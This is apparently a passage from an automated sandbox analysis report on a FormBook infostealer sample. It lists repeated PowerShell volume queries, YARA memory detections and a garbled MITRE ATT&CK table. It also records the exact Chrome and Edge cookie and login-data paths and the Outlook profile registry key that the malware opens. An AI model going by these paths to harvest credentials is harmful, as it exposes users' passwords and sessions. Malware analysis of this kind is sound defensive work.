            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_0040604F GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_0040604F

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Shared Modules            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		LSASS Memory115
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell            		Logon Script (Windows)1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		Security Account Manager321
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook611
            Process Injection            		1
            Software Packing            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets131
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
            Virtualization/Sandbox Evasion            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt611
